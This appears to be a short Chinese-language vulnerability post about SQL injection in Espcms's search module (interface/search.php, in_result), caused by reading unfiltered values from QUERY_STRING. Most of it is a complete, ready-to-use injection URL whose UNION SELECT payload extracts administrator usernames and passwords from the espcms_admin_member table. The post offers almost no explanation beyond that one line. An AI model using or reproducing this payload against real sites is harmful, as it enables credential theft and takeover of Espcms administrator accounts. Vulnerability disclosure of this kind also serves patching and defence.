Espcms搜索处存SQL注入漏洞,可得到管理员密码

和wap模块下的SQL注入原理一样,都是从$_SERVER[‘QUERY_STRING’]中去取变量导致绕过过滤的情况。

在/interface/search.php文件的in_result函数中:

http://www.0day5.com/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23

POC:

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录